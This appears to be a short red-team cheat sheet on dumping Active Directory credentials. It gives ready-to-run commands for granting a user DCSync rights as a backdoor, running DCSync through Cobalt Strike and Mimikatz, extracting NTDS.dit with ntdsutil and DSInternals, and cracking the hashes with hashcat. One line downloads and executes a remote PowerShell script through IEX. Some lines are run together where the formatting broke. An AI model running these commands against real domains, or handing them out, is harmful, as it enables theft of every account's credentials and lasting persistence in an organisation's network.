DCSync Backdoor
# Enumerate
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -eq "DC=Marvel,DC=local" -and $_.ObjectAceType -match "DS-Replication"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier
# Command
Add-DomainObjectAcl -TargetIdentity "DC=marvel,DC=local" -PrincipalIdentity user4 -Rights DCSync
beacon> dcsync dev.cyberbotic.io DEV\krbtgtNTDS Dump
NTDSutil
ntdsutil
activate instance ntds
ifm
create full C:\audit
quit
quitThen use the DSInternals script to extract all the hashed from this dump.
# https://github.com/MichaelGrafnetter/DSInternals/releases/latest
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHiveFilePath '.\audit\registry\SYSTEM'
Get-ADDBAccount -All -DBPath '.\audit\Active Directory\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File hashes.txt -Encoding asciiMimikatz
lsadump::dcsync /domain:marvel.local /all /csvInvoke DCSync
# https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1
IEX (New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1");
Invoke-DCSync -PWDumpFormatCracking
hashcat.exe -m 1000 -a 0 hashes.txt rockyou.txtLast updated
